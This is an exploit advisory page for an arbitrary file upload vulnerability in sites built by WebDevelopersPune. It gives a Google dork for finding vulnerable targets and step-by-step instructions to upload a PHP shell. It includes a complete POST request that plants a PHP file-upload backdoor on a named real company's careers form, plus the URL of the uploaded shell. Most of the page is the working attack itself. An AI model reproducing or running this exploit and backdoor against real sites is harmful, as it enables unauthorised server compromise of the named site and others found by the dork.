Design by WebDevelopersPune Arbitrary File Upload Vulnerability

2019.05.06
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

############################################################## # Title : Design by WebDevelopersPune Arbitrary File Upload Vulnerability # Author : Dj3Bb4rAn0n ( bassem ) FB/djebbar.bassem.16 # Date : /06/05/2019 # Home : Annaba ( Algeria ) # Tested on : Linux ( Backbox ) # Vendor : http://www.webdeveloperspune.com # Dork : intext:"Design by WebDevelopersPune" ############################################################### [ 1 ] Search in google : intext:"Design by WebDevelopersPune" "careers" [ 2 ] Choose URL then upload your php shell [ 3 ] http://localhost:80/uploadcv/ [ PHP BACKDOOR ] Example : -------------------------------------------------------------------------- http://www.electropotentinfotech.com/careers.html --------------- POST REQUEST ------------------------------------ POST /careers_mail.php HTTP/1.1 Host: www.electropotentinfotech.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://www.electropotentinfotech.com/careers.html Cookie: _ga=GA1.2.1600898550.1557157559; _gid=GA1.2.1741193570.1557157559; _gat=1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------------------10837544701235829337682045570 Content-Length: 1872 -----------------------------10837544701235829337682045570 Content-Disposition: form-data; name="fname" omg -----------------------------10837544701235829337682045570 Content-Disposition: form-data; name="lname" omg -----------------------------10837544701235829337682045570 Content-Disposition: form-data; name="email" dzdz@gmail.net -----------------------------10837544701235829337682045570 Content-Disposition: form-data; name="presentd" ok -----------------------------10837544701235829337682045570 Content-Disposition: form-data; name="presente" ok -----------------------------10837544701235829337682045570 Content-Disposition: form-data; name="yer" 2 -----------------------------10837544701235829337682045570 Content-Disposition: form-data; name="mnth" 6 -----------------------------10837544701235829337682045570 Content-Disposition: form-data; name="presentl" ff -----------------------------10837544701235829337682045570 Content-Disposition: form-data; name="resume"; filename="up.PhP2" Content-Type: application/octet-stream <?php $files = @$_FILES["files"]; if ($files["name"] != '') { $fullpath = $_REQUEST["path"] . $files["name"]; if (move_uploaded_file($files['tmp_name'], $fullpath)) { echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>"; } }echo '<html><head><title>Upload files...Bassemdz IN</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>'; ?> -----------------------------10837544701235829337682045570 Content-Disposition: form-data; name="discription" ok -----------------------------10837544701235829337682045570 Content-Disposition: form-data; name="submit" -----------------------------10837544701235829337682045570-- --------------------------------------------------------------------------------------------------------------- [ + ] http://www.electropotentinfotech.com/uploadcv/190506092639up.PhP2 ---------------------------------------------------------------------------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top